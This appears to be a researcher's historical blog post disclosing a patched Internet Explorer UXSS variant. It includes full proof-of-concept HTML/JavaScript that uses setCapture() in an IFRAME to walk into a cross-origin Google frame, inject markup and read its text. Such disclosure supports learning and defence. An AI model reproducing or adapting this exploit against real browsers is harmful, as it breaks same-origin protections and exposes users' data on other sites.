Case 6445 Variation

After playing around for a while with the original setCapture() UXSS technique (case #6445), I found that the fix didn’t cover all variations. Instead of capturing events on the top window, this variation moves the setCapture() call into a same-domain IFRAME, which still managed to grab event.srcElement from a cross-origin frame.

<HTML><HEAD><TITLE>setCapture() xDomain Variation</TITLE></HEAD>
<BODY>
<FONT SIZE="2" FACE="Tahoma"><B>setCapture xDomain through IFRAMES</B> - Again :( This is a little variation on the case #6445 that I've sent on February. Works also on IE7</FONT><BR>

<IFRAME NAME="xDomain" SRC="" WIDTH="500" HEIGHT="80"></IFRAME><BR>
<IFRAME SRC="http://www.google.com" WIDTH="500" HEIGHT="500"></IFRAME>
<SCRIPT LANGUAGE="JavaScript">
xDomain.document.write('<FONT SIZE="2" FACE="Tahoma">This is the IFRAME where I do the setCapture(). We do not need this text in order for this to work.<BR>Now, <B>click inside the Google IFRAME.</B></FONT>');
xDomain.document.close();

function setCaptureTimeout(){
	//This next line is the variation. Instead of setCapturing the main window, we do it to the empty (our domain) IFRAME.
	xDomain.document.body.setCapture();
	xDomain.document.body.onclick=function(){
		var parentWindow=obj=xDomain.event.srcElement;
		while (obj) {
			parentWindow=obj;
			obj=obj.parentElement;
		}
		parentWindow.document.body.insertAdjacentHTML('afterBegin','<BR><BR><H1>THIS SHOULD NOT BE POSSIBLE :(</H1>');
		xDomain.document.body.onclick=null;
		alert('Google innerText:\n' + parentWindow.document.body.innerText);
	}
}

// We execute with a timeOut because sometimes at this point, the IFRAME is not completeley rendered and
// it may not have -yet- a document.body to do the setCapture(). That's the only reason.
setTimeout('setCaptureTimeout()',100);
</SCRIPT>
</BODY>
</HTML>

The key insight here is that setCapture() routes all mouse events to the capturing element, including events that originate in a different-origin frame. By walking up the parentElement chain from event.srcElement, the script can reach the cross-origin document and read or modify its content. The patch for the original bug had focused on the top-level window case and missed this IFRAME variant.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [DoS - htmlFile Blank Object Eval Stress CPU] :: [DoS - IE7 Close Window No Prompts] >